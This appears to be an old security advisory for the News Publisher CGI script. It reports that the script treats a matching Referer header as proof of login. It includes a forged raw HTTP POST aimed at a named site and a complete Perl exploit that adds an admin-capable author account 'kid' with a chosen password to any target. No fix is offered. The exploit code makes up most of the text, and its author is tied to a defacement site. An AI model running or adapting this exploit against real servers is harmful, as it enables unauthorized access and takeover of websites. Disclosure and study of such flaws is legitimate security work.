COMMAND
News Publisher
SYSTEMS AFFECTED
News Publisher CGI
PROBLEM
'n30' found following. Yet again CGI authors use nested IF
statements to decide what action to take upon and incoming
request. This time the problem allows ppl to add and author into
the 'authors.file' file. This can't be done through a web browser
since the script assumes that if the HTTP_REFERER field is the
URL of the news.cgi script (the main script) then you must have
completed the login process. This assumtion would be true if you
were to use a browser but.... its easily fixed using netcat
therefore by passing this raw HTTP request:
POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: n30/browser
Host: www.speedy3d.com
Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71
author=n30&apassword=teapot&email=don@know.com&name=n30&password=teapot
it is possible to add an author.
Below is a perl script that will add a user into the authors.file
for you with username: kid and the passwerd of your choice.
This is a real problem since on older versions the author.file
was readable with Unix crypt passes, this hole sorta blows that
outta the water! There are many sites using this script and some
would probably be regarded as large. Therefore NOT to misuse the
exploit script!!!
#!/usr/bin/perl
#
# News Publisher EXPLOIT by n30
# Versions: tested on 1.05
# 1.05a
# 1.05b
# 1.06
# Bug Found By: me {n30}
# OS: Unix and Winnt
#
# The Problem:
# The author decided in all his 'enlightened wisdom'
# that if the HTTP_REFERER url is the same as the News Publisher
# news.cgi file. Then U have OBVIOUSLY logged in?
#
# Exploit:
# hmmm me thinks i should change the HTTP_REFERER to:
#
# http://www.server.com/cgi/news.cgi
#
# Using this exploit will add an author account with user kid
# and passwerd of ur choice.
#
# NOTE: There are more inventive ways to use this Vulnerability :)
# ie. maybe?? the Admin screen is protected by the HTTP_REFERER?
#
# n30@alldas.de
# www.alldas.de, defaced.alldas.de {trib's the webmaster not me!}
#
# Shoutz: trib, axess, domz, acidflame, raxie, and all who know me!
#
use strict;
use Socket;
print("\nNews Publisher EXPLOIT\n");
print("By: n30 {n30\@alldas.de}\n");
print("\nShoutz: trib, axess, domz, acidflame, raxie\n");
if (@ARGV < 3) {
print("\nUsage: $0 <target> <dir> <newpass>\n");
print("\n eg => ./sploit.pl www.example.com cgi-bin/news.cgi iisalamer\n");
exit(1);
}
(my $target,my $dir,my $newpass) = @ARGV;
# Setup Content-Length Header :)
my $length = 68 + (2 * length($newpass));
# Print BullShit
print("\nRemote host: $target\n");
print("CGI-script: $dir\n");
print("URL: http://$target/$dir\n");
# Setup URL Command
my $url = "author=kid&apassword=$newpass&email=lamerz\@antionline.com&name=kid&password=$newpass";
print("URL Command: $url\n");
# Necessary to DE-Kiddie da werld :)
my $agent = "-=Attention Admin=- pLz n0te d0wn th1s IP and P4ss ont0 fBi";
my $sploit=
"POST /$dir?addAuthor HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Referer: http://$target/$dir
Content-type: application/x-www-form-urlencoded
Content-length: $length
$url";
my $iaddr = inet_aton($target) || die("Error: $!\n");
my $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
my $proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);
print("\nWh0a chex0r: http://$target/$dir\nuser/pass: kid/$newpass\n");
exit(0);
SOLUTION
Nothing yet.